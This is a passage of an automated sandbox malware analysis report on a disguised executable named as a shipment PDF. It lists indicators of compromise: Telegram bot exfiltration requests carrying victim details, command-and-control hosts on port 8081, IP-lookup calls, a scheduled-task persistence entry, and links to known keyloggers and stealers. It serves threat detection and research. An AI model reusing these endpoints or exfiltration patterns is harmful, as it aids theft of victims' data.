                            		truefalse
                              		high
                              checkip.dyndns.org
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2015/12/2024%20/%2013:48:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high
                                  https://reallyfreegeoip.org/xml/8.46.123.189false
                                    		high
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2016/12/2024%20/%2009:08:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                      		high
                                      http://checkip.dyndns.org/false
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.office.com/MSBuild.exe, 00000011.00000002.3578489712.000000000324A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/chrome_newtabMSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.orgMSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/botShipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://go.microsoMSBuild.exe, 00000009.00000002.3575088087.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://tempuri.org/kviskotekaDbDataSet.xsdcIgraShipment 990847575203.pdf.exe, FZcXKpA.exe.0.drfalse
                                                        		high
                                                        https://www.office.com/lBMSBuild.exe, 00000009.00000002.3578857774.0000000002A95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://checkip.dyndns.orgMSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://chrome.google.com/webstore?hl=enMSBuild.exe, 00000011.00000002.3578489712.0000000003218000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newtab/MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://chrome.google.com/webstore?hl=en8MSBuild.exe, 00000011.00000002.3578489712.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://varders.kozow.com:8081Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://aborters.duckdns.org:8081Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://kashmirestore.comMSBuild.exe, 00000009.00000002.3578857774.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20aMSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://51.38.247.67:8081/_send_.php?LMSBuild.exe, 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.office.com/pMSBuild.exe, 00000009.00000002.3578857774.0000000002A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://anotherarmy.dns.army:8081Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://checkip.dyndns.org/qShipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://chrome.google.com/webstore?hl=enlBMSBuild.exe, 00000011.00000002.3578489712.0000000003213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$MSBuild.exe, 00000009.00000002.3578857774.000000000294D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002992000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://reallyfreegeoip.orgMSBuild.exe, 00000009.00000002.3578857774.0000000002992000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://go.microsoHXMSBuild.exe, 00000009.00000002.3575088087.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameShipment 990847575203.pdf.exe, 00000000.00000002.2421064302.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, FZcXKpA.exe, 0000000A.00000002.2539468876.0000000003317000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedShipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://reallyfreegeoip.org/xml/Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        149.154.167.220
                                                                                                        		api.telegram.orgUnited Kingdom
                                                                                                        		62041TELEGRAMRUfalse
                                                                                                        193.122.6.168
                                                                                                        		unknownUnited States
                                                                                                        		31898ORACLE-BMC-31898USfalse
                                                                                                        119.18.54.39
                                                                                                        		kashmirestore.comIndia
                                                                                                        		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                        158.101.44.242
                                                                                                        		checkip.dyndns.comUnited States
                                                                                                        		31898ORACLE-BMC-31898USfalse
                                                                                                        172.67.177.134
                                                                                                        		reallyfreegeoip.orgUnited States
                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                        132.226.247.73
                                                                                                        		unknownUnited States
                                                                                                        		16989UTMEMUSfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1575105
                                                                                                        Start date and time:2024-12-14 13:48:12 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 8m 44s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:18
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:Shipment 990847575203.pdf.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@21/15@6/6
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 96%
                                                                                                        • Number of executed functions: 199
                                                                                                        • Number of non-executed functions: 8
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.198.119.143, 4.245.163.56, 199.232.214.172, 20.242.39.171, 192.229.221.95, 20.12.23.50
                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                        • VT rate limit hit for: Shipment 990847575203.pdf.exe

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        07:49:30API Interceptor1x Sleep call for process: Shipment 990847575203.pdf.exe modified
                                                                                                        07:49:34API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                                        07:49:39API Interceptor2614857x Sleep call for process: MSBuild.exe modified
                                                                                                        07:49:42API Interceptor1x Sleep call for process: FZcXKpA.exe modified
                                                                                                        13:49:36Task SchedulerRun new task: FZcXKpA path: C:\Users\user\AppData\Roaming\FZcXKpA.exe

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        149.154.167.220gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                          hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                  888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                    https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                        file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            193.122.6.168Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            Payment Confirmation..docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            api.telegram.orggjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            kashmirestore.comTi5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 119.18.54.39
                                                                                                                            xz8lxAetNu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 119.18.54.39
                                                                                                                            05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 119.18.54.39
                                                                                                                            0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 119.18.54.39
                                                                                                                            bg.microsoft.map.fastly.netxu27D0L6Ak.exeGet hashmaliciousDCRatBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                            • 199.232.214.172
                                                                                                                            FW_ TBI Construction Company.emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            cv.docmGet hashmaliciousUnknownBrowse
                                                                                                                            • 199.232.214.172
                                                                                                                            rsIMIwPUAU.docGet hashmaliciousUnknownBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            CwsM6q5l8O.docGet hashmaliciousUnknownBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            5XrJcH26DG.docxGet hashmaliciousUnknownBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            UKBHxdhIyJ.docxGet hashmaliciousSidewinderBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            6msSC60iZ1.docGet hashmaliciousSidewinderBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            PyrNUtAUkw.docxGet hashmaliciousUnknownBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            reallyfreegeoip.orgfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.67.152
                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 104.21.67.152
                                                                                                                            77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 104.21.67.152
                                                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 104.21.67.152
                                                                                                                            hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 104.21.67.152
                                                                                                                            41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 104.21.67.152

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            ORACLE-BMC-31898USelitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                            • 140.204.52.53
                                                                                                                            77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 192.29.14.118
                                                                                                                            Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            TELEGRAMRU7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            PUBLIC-DOMAIN-REGISTRYUSList of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                            • 103.53.42.63
                                                                                                                            s0zqlmETpm.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 216.10.240.70
                                                                                                                            Quote_8714.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 199.79.62.115
                                                                                                                            S1a5ZF3ytp.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 103.53.42.63
                                                                                                                            List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 103.53.42.63
                                                                                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 103.53.42.63
                                                                                                                            h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 216.10.240.70
